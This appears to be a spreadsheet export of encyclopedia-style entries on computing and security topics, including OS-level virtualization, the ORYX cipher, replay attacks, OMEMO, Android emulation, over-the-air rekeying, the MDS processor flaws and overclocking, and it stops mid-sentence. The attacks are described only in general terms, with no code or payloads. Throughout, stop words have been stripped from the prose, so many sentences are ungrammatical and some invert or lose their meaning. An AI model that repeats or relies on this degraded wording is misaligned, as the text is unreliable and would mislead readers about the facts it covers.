    <t>os-level virtualization operating system (os) paradigm kernel allows existence multiple isolated user space instances, called containers (lxc, solaris containers, docker, podman), zones (solaris containers), virtual private servers (openvz), partitions, virtual environments (ves), virtual kernels (dragonfly bsd), jails (freebsd jail chroot jail). such instances look like real computers point view programs running them. computer program running ordinary operating system resources (connected devices, files folders, network shares, power, quantifiable hardware capabilities) computer. however, programs running inside container container's contents devices assigned container. unix-like operating systems, feature seen advanced implementation standard chroot mechanism, changes apparent root folder current running process children. addition isolation mechanisms, kernel often provides resource-management features limit impact container's activities containers. linux containers based virtualization, isolation, resource management mechanisms provided linux kernel, notably linux namespaces cgroups.the term container, popularly referring os-level virtualization systems, sometimes ambiguously used refer fuller virtual machine environments operating varying degrees concert host e.g. microsoft's hyper-v containers. operation ordinary operating systems personal computers, computer program (even though might able access) system's resources. they include: hardware capabilities employed, network connection data read written, files, folders network shares connected peripherals interact with, webcam, printer, scanner, faxthe operating system able allow deny access resources based program requests user account context runs. operating system also hide resources, computer program enumerates them, appear enumeration results. nevertheless, programming point view, computer program interacted resources operating system managed interaction. with operating-system-virtualization, containerization, possible programs within containers, parts resources allocated. program expecting whole computer, inside container, allocated resources believes available. several containers created operating system, subset computer's resources allocated. each container contain number computer programs. these programs concurrently separately, even interact another. containerization similarities application virtualization: latter, computer program placed isolated container isolation applies file system only. uses operating-system-level virtualization commonly used virtual hosting environments, useful securely allocating finite hardware resources among large number mutually-distrusting users. system administrators also consolidating server hardware moving services separate hosts containers server. other typical scenarios include separating several programs separate containers improved security, hardware independence, added resource management features. improved security provided chroot mechanism, however, nowhere near ironclad. operating-system-level virtualization implementations capable live migration also used dynamic load balancing containers nodes cluster. overhead operating-system-level virtualization usually imposes less overhead full virtualization programs os-level virtual partitions operating system's normal system call interface need subjected emulation intermediate virtual machine, case full virtualization (such vmware esxi, qemu, hyper-v) paravirtualization (such user-mode linux). this form virtualization also require hardware support efficient performance. flexibility operating-system-level virtualization flexible virtualization approaches since cannot host guest operating system different host one, different guest kernel. example, linux, different distributions fine, operating systems windows cannot hosted. operating systems using variable input systematics subject limitations within virtualized architecture. adaptation methods including cloud-server relay analytics maintain os-level virtual environment within applications.solaris partially overcomes limitation described branded zones feature, provides ability environment within container emulates older solaris version solaris host. linux branded zones (referred "lx" branded zones) also available x86-based solaris systems, providing complete linux userspace support execution linux applications; additionally, solaris provides utilities needed install enterprise linux centos linux distributions inside "lx" zones. however, 2010 linux branded zones removed solaris; 2014 reintroduced illumos, open source solaris fork, supporting 32-bit linux kernels. storage some implementations provide file-level copy-on-write (cow) mechanisms. (most commonly, standard file system shared partitions, partitions change files automatically create copies.) this easier back space-efficient simpler cache block-level copy-on-write schemes common whole-system virtualizers. whole-system virtualizers, however, work non-native file systems create roll back snapshots entire system state. implementations linux containers listed include: lxd, alternative wrapper around developed canonical podman, drop-in replacement docker charliecloud, container tools used systems kata containers microvm platform bottlerocket linux-based open-source operating system purpose-built amazon services running containers virtual machines bare metal hosts also container orchestration linux namespaces cgroups sandbox (software development) container linux hypervisor portable application creators open container initiative separation kernel serverless computing snap package manager storage hypervisor virtual private server (vps) virtual resource partitioning notes references external links introduction virtualization short intro three different virtualization techniques virtualization containerization application infrastructure: comparison, june 2015, mathijs jeroen scheepers containers persistent data, lwn.net, 2015, josh berkus</t>
  </si>
  <si>
    <t>ORYX</t>
  </si>
  <si>
    <t>oryx encryption algorithm used cellular communications order protect data traffic. stream cipher designed strong 96-bit strength reduce strength 32-bits export. however, mistakes actual strength trivial 16-bits signal cracked first 25–27 bytes.it four cryptographic primitives standardized tia's digital cellular communications standards tdma cdma. algorithm description oryx simple stream cipher based binary linear-feedback shift registers (lfsrs) protect cellular data transmissions (for wireless data services). cipher oryx four components: three 32-bit lfsrs labeled lfsra, lfsrb lfsrk, s-box containing known permutation integer values 255. feedback function lfsrk defined feedback functions lfsra defined feedback function lfsrb also a5/1, used cellular telephone standard. cmea, cellular message encryption algorithm. notes external links brief description kremlinencrypt.com cryptanalysis mobile phone cryptology</t>
  </si>
  <si>
    <t>Replay attack</t>
  </si>
  <si>
    <t>replay attack (also known repeat attack playback attack) form network attack valid data transmission maliciously fraudulently repeated delayed. this carried either originator adversary intercepts data re-transmits possibly part spoofing attack packet substitution. this lower-tier versions man-in-the-middle attack. replay attacks usually passive nature. another describing attack attack security protocol using replay messages different context intended original expected) context, thereby fooling honest participant(s) thinking successfully completed protocol run." example suppose alice wants prove identity bob. requests password proof identity, alice dutifully provides (possibly transformation like hashing, even salting, password); meanwhile, eavesdropping conversation keeps password hash). after interchange over, (acting alice) connects bob; asked proof identity, sends alice's password hash) read last session accepts, thus granting access. prevention countermeasures replay attacks prevented tagging encrypted component session component number. this combination solutions anything interdependent another. fact interdependency, fewer vulnerabilities. this works unique, random session created program; thus, previous becomes difficult replicate. case, attacker would unable perform replay session would changed.session ids, also known session tokens, mechanism used help avoid replay attacks. generating session works follows. sends one-time token alice, alice uses transform password send result bob. example, would token compute hash function session token append password used. side performs computation session token. alice’s bob’s values match, login successful. suppose attacker captured value tries another session. would send different session token, replies captured value different bob's computation know alice.session tokens chosen random process (usually, pseudorandom processes used). otherwise, able pose bob, presenting predicted future token, convince alice token transformation. replay reply later time (when previously predicted token actually presented bob), accept authentication. one-time passwords similar session tokens password expires used short amount time. they used authenticate individual transactions addition sessions. these also used authentication process help establish trust parties communicating other. also send nonces include message authentication code (mac), alice check. timestamping another preventing replay attack. synchronization achieved using secure protocol. example, periodically broadcasts time clock together mac. when alice wants send message, includes best estimate time clock message, also authenticated. accepts messages timestamp within reasonable tolerance. timestamps also implemented mutual authentication, alice authenticate unique session ids, order prevent replay attacks. advantages scheme need generate (pseudo-) random numbers alice need random number. networks unidirectional near unidirectional, advantage. trade-off replay attacks, performed quickly enough i.e. within 'reasonable' limit, could succeed. kerberos protocol prevention kerberos authentication protocol includes countermeasures. classic case replay attack, message captured adversary replayed later date order produce effect. example, banking scheme vulnerable attack, message results transfer funds could replayed transfer funds originally intended. however, kerberos protocol, implemented microsoft windows active directory, includes scheme involving time stamps severely limit effectiveness replay attacks. messages past "time live (ttl)" considered discarded.there improvements proposed, including triple password scheme. these three passwords used authentication server, ticket-granting server, tgs. these servers passwords encrypt messages secret keys different servers. encryption provided three keys help preventing replay attacks. secure routing networks wireless networks also susceptible replay attacks. case, authentication system improved made stronger extending aodv protocol. this method improving security networks increases security network small amount overhead. extensive overhead network would risk becoming slower performance would decrease. keeping relatively overhead, network maintain better performance still improving security. challenge-handshake authentication protocol authentication sign-on clients using point-to-point protocol (ppp) susceptible replay attacks using password authentication protocol (pap) validate identity, authenticating client sends username password "normal text", authenticating server sends acknowledgment response this; intercepting client therefore, free read transmitted data impersonate client server other, well able store client credentials later impersonation server. challenge-handshake authentication protocol (chap) secures sort replay attack authentication phase instead using "challenge" message authenticator client responds hash-computed value based shared secret (e.g. client's password), authenticator compares calculation challenge shared secret authenticate client. relying shared secret transmitted, well features authenticator-controlled repetition challenges, changing identifier challenge values, chap provides limited protection replay attacks. real world examples replay attack susceptibility there several real-world examples replay attacks used issues detected fixed order prevent attacks. remote keyless-entry system vehicles many vehicles road remote keyless system, fob, convenience user. modern systems hardened simple replay attacks vulnerable buffered replay attacks. this attack performed placing device receive transmit radio waves within range target vehicle. transmitter attempt vehicle unlock signal receiving placing buffer later use. upon attempts unlock vehicle, transmitter signal, buffer playback one, creating rolling buffer step ahead vehicle. later time, attacker buffered code unlock vehicle. text-dependent speaker verification various devices speaker recognition verify identity speaker. text-dependent systems, attacker record target individual’s speech correctly verified system, play recording verified system. counter-measure devised using spectral bitmaps stored speech verified users. replayed speech different pattern scenario rejected system. popular culture folk tale baba forty thieves, thieves' captain used passphrase "open, simsim" open door loot depot. this overheared baba later reused passphrase access collect much loot could carry. also denial-of-service attack digest access authentication man-in-the-middle attack pre-play attack relay attack session replay telephone tapping references</t>
  </si>
  <si>
    <t>Rawdisk</t>
  </si>
  <si>
    <t>computing, term disk, often referred raw, used refer hard disk access raw, binary level, beneath file system level, using partition data mbr. notable example context platform virtualization, feature certain virtualization software ability access hard disk level. virtualization software typically function usage virtual drive format like ovf, users want virtualization software able operating system installed another disk disk partition. order this, virtualization software must allow disk access disk disk partition, allow entire operating system boot within virtualization window. file system file system indicates state hard drive unknown file system. disk drive file system also known disk drive. when hard drive external storage device shown raw, could file system drive missing damaged drive formatted file system current file system storage medium recognized computer references</t>
  </si>
  <si>
    <t>OPNsense</t>
  </si>
  <si>
    <t>opnsense open source, freebsd-based firewall routing software developed deciso, company netherlands makes hardware sells support packages opnsense. fork pfsense, turn forked m0n0wall, built freebsd. launched january 2015. when m0n0wall closed february 2015 creator, manuel kasper, referred developer community opnsense. opnsense web-based interface used x86-64 platform. along acting firewall, traffic shaping, load balancing, virtual private network capabilities, others added plugins.in november 2017, world intellectual property organization panel found netgate, copyright holder pfsense, used domain opnsense.com faith discredit opnsense, obligated netgate transfer domain ownership deciso. also comparison firewalls list router firewall distributions references further reading upadhyay, rajneesh (september 2015). "how install opnsense firewall". unixmen. jack wallen april, 2019) "how install opnsense firewall/router distribution". techrepublic. stubbig, markus (2019). practical opnsense. books demand. isbn 978-3-748-10723-1. external links official website</t>
  </si>
  <si>
    <t>Replay 4</t>
  </si>
  <si>
    <t>replay proprietary backup disaster recovery software windows application servers developed appassure software released september 2009.replay uses image-based approach backup taking snapshot moment time. provides application integration mission-critical microsoft applications, including microsoft exchange, sql, sharepoint, hyper-v. replay also supports windows small business servers, domain controllers, file servers, servers, blackberry enterprise servers. replay provides support advanced features block level snapshots incremental forever data capture, integrated data deduplication, bare-metal restore dissimilar hardware, failover virtual machines, offsite cloud recovery, etc. latest version adds ability replicate data off-site storage, also incorporates technology data deduplication. awards replay named 2009 backup disaster recovery software product year storage magazine february 2010. 2010, replay named server software product year annual american business awards. also list backup software references external links official website replay administrator's guide replay release notes</t>
  </si>
  <si>
    <t>OMNI (SCIP)</t>
  </si>
  <si>
    <t>omni encryption device manufactured communications. adds secure voice secure data standard analog telephone modem connected computer. scip signalling allows interoperability scip devices secure terminal equipment (ste) phone. bypass mode, stu-iiis communicate another using omni enhance quality voice data. algorithms used omni include type encryption methods. models standard model limited kbit/s. upgrade allows data rates mbit/s. external links omni site voice transmitter website</t>
  </si>
  <si>
    <t>OMEMO</t>
  </si>
  <si>
    <t>omemo extension extensible messaging presence protocol (xmpp) multi-client end-to-end encryption developed andreas straub. according straub, omemo uses double ratchet algorithm provide multi-end multi-end encryption, allowing messages synchronized securely across multiple clients, even offline". name "omemo" recursive acronym "omemo multi-end message object encryption". open standard based double ratchet algorithm personal eventing protocol (pep, xep-0163). omemo offers future forward secrecy deniability message synchronization offline delivery. features comparison otr, omemo protocol offers many-to-many encrypted chat, offline messages queuing, forward secrecy, file transfer, verifiability deniability cost slightly larger message size overhead. history protocol developed first implemented andreas straub google summer code project 2015. project's goal implement double-ratchet-based multi-end multi-end encryption scheme android xmpp-based instant messaging client called conversations. introduced conversations submitted xmpp standards foundation (xsf) proposed xmpp extension protocol (xep) autumn 2015 accepted xep-0384 december 2016.in july 2016, chatsecure project announced would implement omemo next releases. chatsecure v4.0 supports omemo released january 2017.a first experimental release omemo plugin cross-platform xmpp client gajim made available december 2015.in june 2016, non-profit computer security consultancy firm radically open security published analysis omemo protocol. client support selected clients supporting omemo (full list clients also exists): beagleim (macos) chatsecure (ios) conversations (android) converse.js (browser-based) dino (linux, macos) gajim official plugin (linux, windows, bsd) monal (ios) movim (browser-based) official plugin (linux, windows, macos) psi+ official plugin (linux, windows, macos, haiku, freebsd) libpurple clients pidgin finch experimental plugin adium xtra based libpurple plugin profanity experimental plugin (bsd, linux, macos, windows) siskinim (ios) library support smack supports omemo using modules smack-omemo smack-omemo-signal xmppframework (macos, ios, tvos) supports omemo omemomodule extension used conjunction signalprotocol-objc library. references external links homepage xep-0384: omemo encryption (experimental) python library implementing omemo clients omemo protocol implementation omemo omemo support toplist instant message clients</t>
  </si>
  <si>
    <t>OS virtualization and emulation on Android</t>
  </si>
  <si>
    <t>android devices ability virtual machines emulate operating systems. either desktop virtualization, platform virtualization, emulation compatibility layer. desktop virtualization desktop virtualization apps least resource space intensive compared virtualization types, since operating system displayed android device actually located another computer local network elsewhere like internet. depending upon desktop virtualization works, another protocol own. most business oriented desktop virtualization apps require specific types equipment services order fully function. example, vmware horizon client requires specific vmware equipment work.a major downside desktop virtualization apps compared types virtualization emulation technologies require network connection server stated previously above. platform virtualization platform virtualization allows leverage developer anything relates guest operating system affects guest operating system, host operating system. possible guest operating system rooted, host operating system remains unrooted. nature platform virtualization fact virtualize rooted guest greater advantage emulators applications utilize packages require access underlying system itself. platform virtualization software applications, take resources host order virtualization. emulation types emulations emulation operating systems emulation operating systems android require usage form compatibility layer, compatibility layer must utilize form technologies apis inside container. this come limitations emulators utilize proot chroot like environment. unlike terminal emulators emulate internal with/without extension package support, install actual (for example) ubuntu packages, rely much android system limitations. however, packages applications run. terminal emulation internal operating system terminal emulation android device done either actual local loopback device, emulation seems local loopback. most terminal emulations device utilize native terminal toybox toolchain's library functions come every android device. however fact majority functions readily available without utilizing compatibility layer, means toybox functions utilized. order user functions libraries would require user root device functions libraries manually. some terminal emulators allow users enter toybox commands implicitly, require usage "toybox command". with enhancements semi-emulation some terminal emulators like termux allow users packages. this done semi-emulating different environment usage proot and/or toybox back-end. with semi-emulating, predefined ported packages used installed without need rooting device, utilize android system files, reside apps' data containers directories. because toybox used mostly back-end, depends developed, toybox accessed semi-emulated enhanced terminal. extensions many emulators oses allow extensions. aside standard ssh, emulators allow technologies like xsdl. extensions, user emulated/virtualized running desktop-like environment. limitations majority limitations seen emulation-based apps rather platform virtualization based apps, emulation apps must utilize compatibility layer. thus libraries packages work expected like real compatibility layer must work properly must able provide accurate information. however, requires compatibility layer predefined software uses (ex. docker) access many types system- device-related information. this either done toybox programing language libraries android apps made (e.g., java, c#). however, starting android many security restrictions placed apps; restrictions, libraries/classes longer available replaced restrictive libraries/classes.one known limitations implemented apps natively access sandbox root directory sub-directories card. apps wanting access files folders outside card, required android's system file selector. limitation, guest oses running emulation, platform virtualization, compatibility apps longer allowed access files outside card sandbox. majority limitations bypassed rooting android device. however, utilizing linux utilizing emulator virtualization would redundant point could turn device linux environment. internal security enhancements more modern versions android seen internal system security enhancements, system folders files longer accessible even viewable directory's existence. versions android allowed terminal apps view android's root directory (although allowing modifications execution). selinux android utilizes selinux; this, system configuration files editable even readable. thus, apps utilize android api's learn device's system's configuration settings. however, information available apps; this, many compatibility layers emulation apps able every package application. here known applications packages unable run: udisks2 requires udev work well compatibility layer environments, stated sub-sub-section below. snort open vswitch mininet (requires open vswitch run)here commands work, selinux: link show adb, proot, $home $prefix usage because android apps non-privileged container space, virtualization emulation apps must utilize space virtualization emulation. this done either adb, prroot, usage $home $prefix, however majority three utilized emulation apps platform virtualization apps usually different methods. each used different purpose. used emulation terminal-like environment entire android system, usually unprivileged user. $home $prefix using $home $prefix ".". however, $home outside "/data/apps data space" directory android file system, $prefix moved another place like card.for emulators compatibility layers emulate virtualize linux-based android, proot must used. however, proot used, environment inside proot like chroot environment, and/or separate mounted environment. scenario (especially case compatibility layer emulator guest oses), packages applications never designed inside chroot like environment. some well known, prominent packages, applications, commands, including following: systemd libudev (works alongside systemd). init mutter (software) relies upon systemd alternatives issue selinux proot, alternatives must used unusable packages applications alternatives. being alternative, necessarily functions original packages applications. some alternatives include: eudev elogind metacity (predecessor mutter) android modified linux kernel because android modified linux kernel, configuration system files exist android. because this, emulation apps either need provide either version configuration system files application's data space, pre-modified distribution ported linux libraries require usage missing configuration system files, support usage packages. some well known configuration system files android include: /etc/resolv.conf also comparison emulation virtualization apps android virtualization references</t>
  </si>
  <si>
    <t>Over-the-air rekeying</t>
  </si>
  <si>
    <t>over-the-air rekeying (otar) refers transmitting updating encryption keys (rekeying) secure information systems conveying keys encrypted electronic communication channels ("over air"). also referred over-the-air transfer (otat), over-the-air distribution (otad), depending specific type, use, transmission means changed. although acronym refers specifically radio transmission, technology also employed wire, cable, optical fiber. "paperless encryption system" otar originally adopted specifically support high speed data communications previously known "paperless key" systems supported diffie-hellman exchange, firefly exchange technology used obsolete stu-iii "scrambled" telephone) capable handling high speed transmission volumes required normal governmental/military communications traffic. also adopted civilian commercial secure voice use, especially emergency first responders, otar become security technology, preferred basis communications security doctrine world-wide. term "otar" basic lexicon communications security. history otar operationally introduced department defense navy beginning 1988. lieutenant commander david winters, american naval officer london code master final years cold war, first recognize necessity security potential otar. order exploit advantages technology, conceived initiated first large scale practical application deployment.due efficiency vast cost savings inherent otar, commander winters' methods quickly adopted spread navy-wide, following vice admiral tuttle, commander navy telecommunications command, navy "j6", shortly influenced joint chiefs staff bring military services compliance. course, otar shortly became nato standard. this coincided introduction newer cryptographic systems 128-bit electronic key, andvt, ky-58, kg-84a/c, ky-75, capable obtaining updated keys circuit protect secure communications circuits. adoption otar reduces requirements distribution physical keying material physical process loading cryptographic devices tapes. accordingly, otar eliminates need individual stations involved physical changeovers. instead, electronically transmitted keys would normally come network control station (ncs). otat feature permits extracted otat-capable cryptographic system using fill device, kyk-13 kyx-15/kyx-15a loaded ("squirted") another cryptographic system needed. alternatively, encryption systems also configured automatically receive update code keys virtually manual intervention, case (geo-positioning system) navigation satellite signals. present future otar applications adapted civilian emergency service providers users requiring enhanced communications security, extensive parallel technology conversion development produced commercially viable systems include end-to-end generation, distribution, management, control. network controllers remotely, dependably, securely change encryption keys entire network discretion. this simplifies streamlines operations virtually eliminating risk compromise. practical terms, means users need bring return units manual updates, must technicians visit user, station, node service units field. further, unlikely event unit, station, node stolen, mimicked, otherwise compromised, network controller may: remotely inhibit access additional users, stations, nodes network. remotely securely enable network access additional users, stations, nodes. remotely "zeroize" remove user's, station's, node's cryptographic material. remotely securely change update user’s, station's, node's cryptographic keys. significance because introduction technology obviated previous requirements risky, expensive, wide-spread, distribution paper code keys, thereby extinguished vulnerability physical theft loss exploited infamous "johnny walker" ring. elimination vulnerability, although little appreciated time, innovation inestimable impact. placing technology perspective, otar comprised transformation basic foundations communications security decades since introduction otar, single breach code systems occurred. introduction otar technology practical application precipitated creation electronic management system (ekms) permanently altered power balance communications security espionage. recent declassification details relating introduction expected become subject scholarly work. vulnerabilities vulnerabilities accidental, unencrypted clear” transmissions demonstrated systems incorporating otar implemented project digital mobile radio communications standards. references</t>
  </si>
  <si>
    <t>Microarchitectural Data Sampling</t>
  </si>
  <si>
    <t>microarchitectural data sampling (mds) vulnerabilities weaknesses intel microprocessors hyper-threading, leak data across protection boundaries architecturally supposed secure. attacks exploiting vulnerabilities labeled fallout, ridl (rogue in-flight data load), zombieload., zombieload description vulnerabilities implementation speculative execution, processor tries guess instructions needed next. they exploit possibility reading data buffers found different parts processor. microarchitectural store buffer data sampling (msbds), cve-2018-12126 microarchitectural load port data sampling (mlpds), cve-2018-12127 microarchitectural fill buffer data sampling (mfbds), cve-2018-12130 microarchitectural data sampling uncacheable memory (mdsum), cve-2019-11091 transactional asynchronous abort (taa), cve-2019-11135not processors affected variants mds. history according intel 2019 interview wired, intel's researchers discovered vulnerabilities 2018 anyone else. other researchers agreed keep exploit confidential well since 2018.on 2019, various groups security researchers, amongst others austria's graz university technology, belgium's catholic university leuven, netherlands' vrije universiteit amsterdam, disclosure coordinated intel, published discovery vulnerabilities intel microprocessors, named fallout, ridl zombieload. three graz researchers group discovered meltdown spectre year before.on november 2019, variant zombieload attack, called transactional asynchronous abort, disclosed. impact according varying reports, intel processors dating back 2011 2008 affected, fixes associated performance drop. intel reported processors manufactured month disclosure mitigations attacks.intel characterized vulnerabilities "low-to-medium" impact, disagreeing security researchers characterized major, disagreeing recommendation operating system software manufacturers completely disable hyperthreading. nevertheless, zombieload vulnerability used hackers exploiting vulnerability steal information recently accessed affected microprocessor. mitigation fixes operating systems, virtualization mechanisms, browsers microcode necessary. 2019, applying available updates affected system could done mitigate issues. intel incorporated fixes processors starting shortly public announcement vulnerabilities. 2019, mitigation released linux kernel, apple, google, microsoft, amazon released emergency patches products mitigate zombieload. 2019, intel published security advisory website detailing plans mitigate zombieload. also transient execution vulnerabilities hardware security references further reading original papers researchers schwarz, michael; lipp, moritz; moghimi, daniel; bulck, stecklina, julian; prescher, thomas; gruss, daniel (2019-05-14). "zombieload: cross-privilege-boundary data sampling" (pdf). schaik, stephan; milburn, alyssa; österlund, sebastian; frigo, pietro; maisuradze, giorgi; razavi, kaveh; bos, herbert; giuffrida, cristiano (2019-05-14). "ridl: rogue in-flight data load" (pdf). minkin, marina; moghimi, daniel; lipp, moritz; schwarz, michael; bulck, genkin, daniel; gruss, daniel; piessens, frank; sunar, berk; yarom, yuval (2019-05-14). "fallout: reading kernel writes from user space" (pdf). galowicz, jacek; prescher, thomas; stecklina, julian (2019-05-14). "zombieload: cross privilege-boundary data leakage". cyberus technology gmbh. "cpu.fail". graz university technology. 2019-05-14. information processor manufacturers "side channel vulnerability microarchitectural data sampling". intel. 2019-05-14. "deep dive: intel analysis microarchitectural data sampling". intel. 2019-05-14. external links official disclosure website zombieload ridl fallout: attacks vrije universiteit amsterdam</t>
  </si>
  <si>
    <t>Overclocking</t>
  </si>
  <si>
    <t>computing, overclocking practice increasing clock rate computer exceed certified manufacturer. commonly, operating voltage also increased maintain component's operational stability accelerated speeds. semiconductor devices operated higher frequencies voltages increase power consumption heat. overclocked device unreliable fail completely additional heat load removed power delivery components cannot meet increased power demands. many device warranties state overclocking over-specification voids warranty, however increasing number manufacturers allow overclocking long performed (relatively) safely. overview purpose overclocking increase operating speed given component. normally, modern systems, target overclocking increasing performance major chip subsystem, main processor graphics controller, components, system memory (ram) system buses (generally motherboard), commonly involved. trade-offs increase power consumption (heat), noise (cooling), shortened lifespan targeted components. most components designed margin safety deal operating conditions outside manufacturer's control; examples ambient temperature fluctuations operating voltage. overclocking techniques general trade safety margin setting device higher margin, understanding temperature voltage must strictly monitored controlled user. examples operating temperature would need strictly controlled increased cooling, part less tolerant increased temperatures higher speeds. also base operating voltage increased compensate unexpected voltage drops strengthen signalling timing signals, low-voltage excursions likely cause malfunctions higher operating speeds. while modern devices fairly tolerant overclocking, devices finite limits. generally given voltage parts maximum "stable" speed still operate correctly. past speed, device starts giving incorrect results, cause malfunctions sporadic behavior system depending while context usual result system crash, subtle errors undetected, long enough time give unpleasant surprises data corruption (incorrectly calculated results, worse writing storage incorrectly) system failing certain specific tasks (general usage internet browsing word processing appear fine, application wanting advanced graphics crashes system). point, increase operating voltage part allow headroom increases clock speed, increased voltage also significantly increase heat output, well shorten lifespan further. point, limit imposed ability supply device sufficient power, user's ability cool part, device's maximum voltage tolerance achieves destructive failure. overzealous voltage inadequate cooling rapidly degrade device's performance point failure, extreme cases outright destroy speed gained overclocking depends largely upon applications workloads system, components overclocked user; benchmarks different purposes published. underclocking conversely, primary goal underclocking reduce power consumption resultant heat generation device, trade-offs lower clock speeds reductions performance. reducing cooling requirements needed keep hardware given operational temperature knock-on benefits lowering number speed fans allow quieter operation, mobile devices increase length battery life charge. some manufacturers underclock components battery-powered equipment improve battery life, implement systems detect device operating battery power reduce clock frequency. underclocking undervolting would attempted desktop system operate silently (such home entertainment center) potentially offering higher performance currently offered low-voltage processor offerings. this would "standard-voltage" part attempt lower voltages (while attempting keep desktop speeds) meet acceptable performance/noise target build. this also attractive using "standard voltage" processor "low voltage" application avoided paying traditional price premium officially certified voltage version. however like overclocking guarantee success, builder's time researching given system/processor combinations especially time tedium performing many iterations stability testing need considered. usefulness underclocking (again like overclocking) determined processor offerings, prices, availability specific time build. underclocking also sometimes used troubleshooting. enthusiast culture overclocking become accessible motherboard makers offering overclocking marketing feature mainstream product lines. however, practice embraced enthusiasts professional users, overclocking carries risk reduced reliability, accuracy damage data equipment. additionally, manufacturer warranties service agreements cover overclocked components incidental damages caused use. while overclocking still option increasing personal computing capacity, thus workflow productivity professional users, importance stability testing components thoroughly employing production environment cannot overstated. overclocking offers several draws overclocking enthusiasts. overclocking allows testing components speeds currently offered manufacturer, speeds officially offered specialized, higher-priced versions product. general trend computing industry technologies tend debut high-end market first, later trickle performance mainstream market. high-end part differs increased clock speed, enthusiast attempt overclock mainstream part simulate high-end offering. this give insight over-the-horizon technologies perform officially available mainstream market, especially helpful users considering plan ahead purchase upgrade feature officially released. some hobbyists enjoy building, tuning, "hot-rodding" systems competitive benchmarking competitions, competing like-minded users high scores standardized computer benchmark suites. others purchase low-cost model component given product line, attempt overclock part match expensive model's stock performance. another approach overclocking older components attempt keep pace increasing system requirements extend useful service life older part least delay purchase hardware solely performance reasons. another rationale overclocking older equipment even overclocking stresses equipment point failure earlier, little lost already depreciated, would needed replaced case. components technically component uses timer clock) synchronize internal operations overclocked. most efforts computer components however focus specific components, processors (a.k.a. cpu), video cards, motherboard chipsets, ram. most modern processors derive effective operating speeds multiplying base clock (processor speed) internal multiplier within processor (the multiplier) attain final speed. computer processors generally overclocked manipulating multiplier option available, processor components also overclocked increasing base speed clock. some systems allow additional tuning clocks (such system clock) influence clock speed that, multiplied processor allow finer adjustments final processor speed. most systems expose user adjustments needed change processor clock speed voltage bios oem's motherboard, precludes overclocking (for warranty support reasons). processor installed different motherboard offering adjustments allow user change them. given component ultimately stop operating reliably past certain clock speed. components generally show sort malfunctioning behavior indication compromised stability alerts user given speed stable, always possibility component permanently fail without warning, even voltages kept within pre-determined safe values. maximum speed determined overclocking point first instability, accepting last stable slower setting. components guaranteed operate correctly rated values; beyond different samples different overclocking potential. end-point given overclock determined parameters available multipliers, dividers, voltages; user's ability manage thermal loads, cooling techniques; several factors individual devices semiconductor clock thermal tolerances, interaction components rest system. considerations there several things considered overclocking. first ensure component supplied adequate power voltage sufficient operate clock rate. supplying power improper settings applying excessive voltage permanently damage component. professional production environment, overclocking likely used increase speed justifies cost expert support required, possibly reduced reliability, consequent effect maintenance contracts warranties, higher power consumption. faster speed required often cheaper costs considered faster hardware. cooling electronic circuits produce heat generated movement electric current. clock frequencies digital circuits voltage applied increase, heat generated components running higher performance levels also increases. relationship clock frequencies thermal design power (tdp) linear. however, limit maximum frequency called "wall". overcome issue, overclockers raise chip voltage increase overclocking potential. voltage increases power consumption consequently heat generation significantly (proportionally square voltage linear circuit, example); requires cooling avoid damaging hardware overheating. addition, digital circuits slow high temperatures changes mosfet device characteristics. conversely, overclocker decide decrease chip voltage overclocking process known undervolting), reduce heat emissions performance remains optimal. stock cooling systems designed amount power produced non-overclocked use; overclocked circuits require cooling, powerful fans, larger heat sinks, heat pipes water cooling. mass, shape, material influence ability heatsink dissipate heat. efficient heatsinks often made entirely copper, high thermal conductivity, expensive. aluminium widely used; good thermal characteristics, though good copper, significantly cheaper. cheaper materials steel good thermal characteristics. heat pipes used improve conductivity. many heatsinks combine materials achieve balance performance cost. water cooling carries waste heat radiator. thermoelectric cooling devices actually refrigerate using peltier effect help high thermal design power (tdp) processors made intel early twenty-first century. thermoelectric cooling devices create temperature differences plates running electric current plates. this method cooling highly effective, generates significant heat elsewhere must carried away, often convection-based heatsink water cooling system. other cooling methods forced convection phase transition cooling used refrigerators adapted computer use. liquid nitrogen, liquid helium, used coolants extreme cases, record-setting attempts one-off experiments rather cooling everyday system. june 2006, georgia institute technology jointly announced record silicon-based chip clock rate (the rate transistor switched clock rate) ghz, done cooling chip (−268.6 −451.6 using liquid helium. november 2012, frequency world record 8.794 january 2022. these extreme methods generally impractical long term, require refilling reservoirs vaporizing coolant, condensation form chilled components. moreover, silicon-based junction gate field-effect transistors (jfet) degrade temperatures roughly (−173 −280 eventually cease function "freeze out" (−233 −388 since silicon ceases semiconducting, using extremely cold coolants cause devices fail. submersion cooling, used cray-2 supercomputer, involves sinking part computer system directly chilled liquid thermally conductive electrical conductivity. advantage technique condensation form components. good submersion liquid fluorinert made expensive. another option mineral oil, impurities water might cause conduct electricity.amateur overclocking enthusiasts used mixture solvent freezing point, acetone isopropyl alcohol. this cooling bath, often used laboratories, achieves temperature however, practice discouraged safety risks; solvents flammable volatile, cause frostbite (through contact exposed skin) suffocation (due large volume carbon dioxide generated sublimes). stability functional correctness overclocked component operates outside manufacturer's recommended operating conditions, function incorrectly, leading system instability. another risk silent data corruption undetected errors. such failures might never correctly diagnosed instead incorrectly attributed software bugs applications, device drivers, operating system. overclocked permanently damage components enough cause misbehave (even normal operating conditions) without becoming totally unusable. large-scale 2011 field study hardware faults causing system crash consumer laptops showed four times increase (depending manufacturer) system crashes failure overclocked computers eight-month period.in general, overclockers claim testing ensure overclocked system stable functioning correctly. although software tools available testing hardware stability, generally impossible private individual thoroughly test functionality processor. achieving good fault coverage requires immense engineering effort; even resources dedicated validation manufacturers, faulty components even design faults always detected. particular "stress test" verify functionality specific instruction sequence used combination data detect faults operations. example, arithmetic operation produce correct result incorrect flags; flags checked, error undetected. complicate matters, process technologies silicon insulator (soi), devices display hysteresis—a circuit's performance affected events past, without carefully targeted tests possible particular sequence state changes work overclocked rates situation another even voltage temperature same. often, overclocked system passes stress tests experiences instabilities programs.in overclocking circles, "stress tests" "torture tests" used check correct operation component. these workloads selected high load component interest (e.g. graphically intensive application testing video cards, different math-intensive applications testing general cpus). popular stress tests include prime95, everest, superpi, occt, aida64, linpack (via linx intelburntest guis), sisoftware sandra, boinc, intel thermal analysis tool memtest86. hope functional-correctness issues overclocked component manifest tests, errors detected test, component deemed "stable". since fault coverage important stability testing, tests often long periods time, hours even days. overclocked computer sometimes described using number hours stability program used, "prime hours stable". factors allowing overclocking overclockability arises part economics manufacturing processes cpus components. many cases components manufactured process, tested manufacture determine actual maximum ratings. components marked rating chosen market needs semiconductor manufacturer. manufacturing yield high, higher-rated components required produced, manufacturer mark sell higher-performing components lower-rated marketing reasons. cases, true maximum rating component exceed even highest rated component sold. many devices sold lower 